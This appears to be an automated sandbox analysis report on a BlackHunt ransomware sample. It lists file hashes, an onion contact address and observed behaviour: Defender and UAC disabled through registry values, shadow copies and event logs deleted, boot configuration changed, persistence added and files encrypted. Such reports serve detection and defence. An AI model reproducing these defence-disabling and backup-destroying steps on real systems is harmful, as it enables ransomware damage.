Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 23:29
Static task
static1
Behavioral task
behavioral1
Sample
5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe
Resource
win10v2004-20231215-en
General
-
Target
5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe
-
Size
707KB
-
MD5
d4544e1fbb0d4f753dc09a7298080d5c
-
SHA1
4843f585657c1bdb418d748a855d775202049bda
-
SHA256
5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435
-
SHA512
b16dea112c656bbe50dc3202ccef71caf8daa13006aacd5a77c4ae6a8ce833918768e71e11345e7d0238eabd4c2b5a82fbf3b380c27aa1e7d303dae98150b1b2
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1086vnh:6uaTmkZJ+naie5OTamgEoKxLWXUh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3836 fsutil.exe 2748 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3772 wevtutil.exe 4020 wevtutil.exe 4084 wevtutil.exe 3124 wevtutil.exe 4000 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1560 bcdedit.exe 320 bcdedit.exe 3944 bcdedit.exe 3372 bcdedit.exe -
Renames multiple (2875) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2460 wbadmin.exe 2900 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3780 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\W: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\Z: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\X: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\M: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\F: conhost.exe File opened (read-only) \??\R: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\A: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\G: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\Q: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\Y: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\H: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\O: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\P: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\F: reg.exe File opened (read-only) \??\E: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\L: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\V: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\T: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\I: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\K: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\N: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\U: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\S: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened (read-only) \??\J: 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\DVD Maker\it-IT\#BlackHunt_Private.key 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Atikokan 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\#BlackHunt_ReadMe.hta 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\sa-jdi.jar 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\GRAY.pf 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\#BlackHunt_ReadMe.txt 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Managua 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#BlackHunt_ReadMe.txt 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\#BlackHunt_ReadMe.hta 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#BlackHunt_ReadMe.hta 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\#BlackHunt_Private.key 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jre7\COPYRIGHT 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy.jar 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Cairo 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\#BlackHunt_ReadMe.txt 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Chita 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#BlackHunt_Private.key 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#BlackHunt_Private.key 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dubai 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\whitemask1047.png 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dhaka 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_window.html 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_ButtonGraphic.png 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtobe 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Nauru 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\.lastModified 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\#BlackHunt_ReadMe.txt 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\7-Zip\descript.ion 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Ushuaia 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Hobart 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\#BlackHunt_Private.key 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotslightoverlay.png 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_VideoInset.png 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#BlackHunt_ReadMe.hta 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6CDT 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\#BlackHunt_ReadMe.txt 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files (x86)\Reference Assemblies\#BlackHunt_ReadMe.hta 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.txt 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\VideoLAN\VLC\skins\#BlackHunt_ReadMe.hta 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_SelectionSubpicture.png 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\DVD Maker\soniccolorconverter.ax 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\updater.jar 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_ReadMe.txt 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\colorcycle.png 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tahiti 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-bullet.png 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\#BlackHunt_ReadMe.hta 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tongatapu 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\#BlackHunt_ReadMe.txt 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2856 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2900 vssadmin.exe 3032 vssadmin.exe 2272 vssadmin.exe 1104 vssadmin.exe 2604 vssadmin.exe 3184 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1312 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3996 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1116 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe Token: SeRestorePrivilege 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe Token: SeBackupPrivilege 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe Token: SeTakeOwnershipPrivilege 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe Token: SeAuditPrivilege 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe Token: SeSecurityPrivilege 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe Token: SeIncBasePriorityPrivilege 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe Token: SeBackupPrivilege 320 conhost.exe Token: SeRestorePrivilege 320 conhost.exe Token: SeAuditPrivilege 320 conhost.exe Token: SeBackupPrivilege 2908 reg.exe Token: SeRestorePrivilege 2908 reg.exe Token: SeSecurityPrivilege 2908 reg.exe Token: SeSecurityPrivilege 4000 wevtutil.exe Token: SeBackupPrivilege 4000 wevtutil.exe Token: SeSecurityPrivilege 4020 wevtutil.exe Token: SeBackupPrivilege 4020 wevtutil.exe Token: SeSecurityPrivilege 3772 wevtutil.exe Token: SeBackupPrivilege 3772 wevtutil.exe Token: SeSecurityPrivilege 3124 wevtutil.exe Token: SeBackupPrivilege 3124 wevtutil.exe Token: SeSecurityPrivilege 4084 wevtutil.exe Token: SeBackupPrivilege 4084 wevtutil.exe Token: SeDebugPrivilege 1312 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1372 wrote to memory of 3068 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 155 PID 1372 wrote to memory of 3068 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 155 PID 1372 wrote to memory of 3068 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 155 PID 1372 wrote to memory of 3068 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 155 PID 1372 wrote to memory of 2536 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 153 PID 1372 wrote to memory of 2536 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 153 PID 1372 wrote to memory of 2536 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 153 PID 1372 wrote to memory of 2536 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 153 PID 1372 wrote to memory of 2092 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 151 PID 1372 wrote to memory of 2092 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 151 PID 1372 wrote to memory of 2092 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 151 PID 1372 wrote to memory of 2092 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 151 PID 1372 wrote to memory of 3048 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 28 PID 1372 wrote to memory of 3048 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 28 PID 1372 wrote to memory of 3048 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 28 PID 1372 wrote to memory of 3048 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 28 PID 3068 wrote to memory of 2896 3068 cmd.exe 148 PID 3068 wrote to memory of 2896 3068 cmd.exe 148 PID 3068 wrote to memory of 2896 3068 cmd.exe 148 PID 1372 wrote to memory of 2560 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 146 PID 1372 wrote to memory of 2560 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 146 PID 1372 wrote to memory of 2560 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 146 PID 1372 wrote to memory of 2560 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 146 PID 1372 wrote to memory of 2660 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 144 PID 1372 wrote to memory of 2660 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 144 PID 1372 wrote to memory of 2660 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 144 PID 1372 wrote to memory of 2660 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 144 PID 1372 wrote to memory of 2720 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 142 PID 1372 wrote to memory of 2720 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 142 PID 1372 wrote to memory of 2720 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 142 PID 1372 wrote to memory of 2720 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 142 PID 1372 wrote to memory of 2608 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 140 PID 1372 wrote to memory of 2608 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 140 PID 1372 wrote to memory of 2608 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 140 PID 1372 wrote to memory of 2608 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 140 PID 2536 wrote to memory of 2952 2536 cmd.exe 138 PID 2536 wrote to memory of 2952 2536 cmd.exe 138 PID 2536 wrote to memory of 2952 2536 cmd.exe 138 PID 2092 wrote to memory of 2464 2092 cmd.exe 137 PID 2092 wrote to memory of 2464 2092 cmd.exe 137 PID 2092 wrote to memory of 2464 2092 cmd.exe 137 PID 1372 wrote to memory of 1132 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 136 PID 1372 wrote to memory of 1132 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 136 PID 1372 wrote to memory of 1132 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 136 PID 1372 wrote to memory of 1132 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 136 PID 1372 wrote to memory of 2336 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 134 PID 1372 wrote to memory of 2336 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 134 PID 1372 wrote to memory of 2336 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 134 PID 1372 wrote to memory of 2336 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 134 PID 1372 wrote to memory of 2808 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 133 PID 1372 wrote to memory of 2808 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 133 PID 1372 wrote to memory of 2808 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 133 PID 1372 wrote to memory of 2808 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 133 PID 1372 wrote to memory of 2480 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 131 PID 1372 wrote to memory of 2480 1372 5b6122152c1b8f5fa4660cdb9dc599e8125b0a10cccc22831bd4eaaa3f055435.exe 131 PID 1372 wrote to memory of 2480 1372 